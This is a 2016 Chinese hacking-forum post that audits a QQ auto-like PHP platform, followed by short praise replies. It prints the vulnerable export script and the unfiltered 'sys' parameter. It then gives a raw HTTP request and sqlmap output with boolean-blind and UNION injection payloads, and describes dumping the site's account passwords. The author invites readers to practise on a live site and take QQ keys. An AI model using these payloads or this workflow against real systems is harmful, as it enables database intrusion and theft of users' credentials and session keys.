请选择 进入手机版 | 继续访问电脑版

SSS安全论坛

 找回密码
 立即注册

QQ登录

只需一步,快速开始

产品
产品
团队
团队
版规
版规
查看: 1998|回复: 36

某秒赞平台通用sql漏洞-[函数未过滤]

[复制链接]
  • TA的每日心情
    开心
    2015-11-23 21:01
  • 签到天数: 5 天

    [LV.2]偶尔看看I

    发表于 2016-2-12 22:18:35 | 显示全部楼层 |阅读模式
    第二次审计第二次审计

    此次审计我关闭了自带的360监控!

    此次存在漏洞文件:/template/public/output.php
    代码简单我就全放上来:
    [PHP] 纯文本查看 复制代码
    <?php
    //导出任务为TXT文件
    if(!defined('IN_CRONLITE'))exit();
    
    if($_GET['type']=='group') {
            $qq=daddslashes($_GET['qq']);
            $groupid=daddslashes($_GET['groupid']);
            if(!$qq || !$groupid) {
                    exit('Something is blank');
            }
            $row=$DB->get_row("SELECT * FROM ".DBQZ."_qq WHERE qq='{$qq}' limit 1");
            if($row['lx']!=$gl && $isadmin==0) {
                    exit('No permission');
            }
            $skey=$row['skey'];
            $gtk = getGTK($skey);
            $cookie="uin=o0" . $qq . "; skey=" . $skey . ";";
            $ua='Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36';
            $url='http://qun.qzone.qq.com/cgi-bin/get_group_member?callbackFun=_GroupMember&uin='.$qq.'&groupid='.$groupid.'&neednum=1&r=0.973228807809788&g_tk='.$gtk.'&ua=Mozilla%2F5.0%20(Windows%20NT%206.3%3B%20WOW64%3B%20rv%3A25.0)%20Gecko%2F20100101%20Firefox%2F25.0&ptlang=2052';
            $data = get_curl($url,0,'http://qun.qzone.qq.com/group',$cookie,0,$ua);
            preg_match('/_GroupMember_Callback\((.*?)\)\;/is',$data,$json);
            $arrs = json_decode($json[1],true);
            if (!$arrs) {
                    exit('Failed');
            }
            $file_name='group_member_'.$groupid.'.txt';
            $output='';
            foreach($arrs['data']['item'] as $row) {
                    $output.=$row['uin']."\r\n";
            }
    } else {
            if(isset($_GET['sys']))
            {
                    $sysid=$_GET['sys'];
                    $rs=$DB->query("SELECT * FROM ".DBQZ."_job WHERE lx='{$gl}' and sysid='{$sysid}' and type!='3' order by jobid desc");
                    $file_name='output_sys'.$sysid.'_'.date("YmdHis").'.txt';
            } else {
                    $rs=$DB->query("SELECT * FROM ".DBQZ."_job WHERE lx='{$gl}' and type!='3' order by jobid desc");
                    $file_name='output_'.date("YmdHis").'.txt';
            }
            $output='';
            while($myrow = $DB->fetch($rs))
            {
                    $output.=$myrow['url']."\r\n";
            }
    }
    $file_size=strlen($output);
    header("Content-Description: File Transfer");
    header("Content-Type:application/force-download");
    header("Accept-Ranges: bytes");
    header("Content-Length: {$file_size}");
    header("Content-Disposition:attachment; filename={$file_name}");
    print($output);
    ?>



    是在导出这个地方

                                   
    登录/注册后可看大图

    /index.php?mod=output&sys=1

                                   
    登录/注册后可看大图


    看看数据库做了什么:

                                   
    登录/注册后可看大图


    SELECT * FROM wjob_job WHERE lx='test' and sysid='1' and type!='3' order by jobid desc




    问题就出在这个sysid就是 sys 我们可控的,我们加一个单引号看看:

                                   
    登录/注册后可看大图

    [PHP] 纯文本查看 复制代码
    SELECT * FROM wjob_job WHERE lx='test' and sysid='1'' and type!='3' order by jobid desc


    单引号成功带入数据库,造成溢出,我们直接post丢进sqlmap看看:

    post数据:
    [HTML] 纯文本查看 复制代码
    GET /www/index.php?mod=output&sys=1 HTTP/1.1
    Host: localhost
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
    Referer: http://localhost/www/index.php?mod=list&sys=1
    Accept-Encoding: gzip, deflate, sdch
    Accept-Language: zh-CN,zh;q=0.8
    Cookie: token=4937pSi9jbj8Jw3VeU8jIM6MXKB63inf2EmtcjyuqCMhX%2F8cB4w6Lh%2FQ5mcbgMy2GJe5LBPgul%2FDlfyMerxlIODI; uachar=default; PHPSESSID=ud3uinhdo7a49rglvktt69iur1
    Connection: close
    



    看看结果:

                                   
    登录/注册后可看大图

    游客,如果您要查看本帖隐藏内容请回复




    我们看看数据开库:

                                   
    登录/注册后可看大图



    但是这样跑容易吧网站弄死,所以我们换一个方式直接下载网站的账号密码,结合第二次审计的注入,我们直接构造语句:

    游客,如果您要查看本帖隐藏内容请回复


    看看数据库做的语句:

                                   
    登录/注册后可看大图


    [C++] 纯文本查看 复制代码
    sqlmap identified the following injection points with a total of 158 HTTP(s) req
    uests:
    ---
    Parameter: sys (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: mod=output&sys=1' AND 3904=3904 AND 'IslO'='IslO
    
        Type: UNION query
        Title: MySQL UNION query (96) - 23 columns
        Payload: mod=output&sys=1' UNION ALL SELECT 96,96,96,CONCAT(0x717a627071,0x6
    e42686f4b7578445757,0x7162766271),96,96,96,96,96,96,96,96,96,96,96,96,96,96,96,9
    6,96,96,96#
    ---
    [06:28:14] [INFO] testing MySQL
    [06:28:17] [INFO] confirming MySQL
    [06:28:23] [INFO] the back-end DBMS is MySQL
    web server operating system: Windows
    web application technology: PHP 5.3.29, Apache 2.4.18
    back-end DBMS: MySQL >= 5.0.0
    [06:28:23] [INFO] fetched data logged to text files under 'C:\Users\Administrato
    r\.sqlmap\output\localhost'




    然后直接下载账号密码:

                                   
    登录/注册后可看大图


                                   
    登录/注册后可看大图



    那么问题来了,大牛们如果开了360webscan你们打算怎么办?


    送上个网站给大家练手,弄到QQkey大家自己玩玩!


    By 噬魂










    回复

    使用道具 举报

  • TA的每日心情
    擦汗
    2016-8-13 10:12
  • 签到天数: 12 天

    [LV.3]偶尔看看II

    发表于 2016-2-13 02:39:51 | 显示全部楼层
    66666666666666666
  • TA的每日心情
    无聊
    2016-12-8 23:13
  • 签到天数: 32 天

    [LV.5]常住居民I

    发表于 2016-2-13 03:07:54 | 显示全部楼层
    前排!!!我草!@!!
    回复

    使用道具 举报

  • TA的每日心情
    奋斗
    5 天前
  • 签到天数: 126 天

    [LV.7]常住居民III

    发表于 2016-2-13 13:34:44 | 显示全部楼层
    卧槽大牛又来了!!!!】
  • TA的每日心情
    开心
    2016-10-21 11:31
  • 签到天数: 111 天

    [LV.6]常住居民II

    发表于 2016-2-13 15:22:27 | 显示全部楼层
    99999999999999999
  • TA的每日心情
    慵懒
    2016-10-15 10:57
  • 签到天数: 38 天

    [LV.5]常住居民I

    发表于 2016-2-13 15:24:51 | 显示全部楼层
    来学习一下哈  哈哈  
  • TA的每日心情
    开心
    2016-6-17 20:48
  • 签到天数: 3 天

    [LV.2]偶尔看看I

    发表于 2016-2-13 15:57:08 | 显示全部楼层
    这审计的666~    厉害
  • TA的每日心情
    郁闷
    2015-11-25 01:02
  • 签到天数: 49 天

    [LV.5]常住居民I

    发表于 2016-2-13 17:21:42 | 显示全部楼层
    这审计比其他人弄得强多了 顶顶!!!!
  • TA的每日心情
    慵懒
    2016-11-18 12:56
  • 签到天数: 160 天

    [LV.7]常住居民III

    发表于 2016-2-13 17:43:38 | 显示全部楼层
    66666666                                 
  • TA的每日心情

    2016-9-17 11:07
  • 签到天数: 17 天

    [LV.4]偶尔看看III

    发表于 2016-2-13 18:22:56 | 显示全部楼层
    66666  我喜欢
    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    关闭

    站长推荐上一条 /1 下一条

    关注微信赢邀请码

    QQ|Archiver|手机版|网站地图|网页地图|SSS安全论坛 ( 黔ICP备15010987号  

    GMT+8, 2017-1-18 21:59 , Processed in 0.188941 second(s), 36 queries .

    Powered by SSS团队 X3.2

    © 2014-2015 Comsenz Inc.

    快速回复 返回顶部 返回列表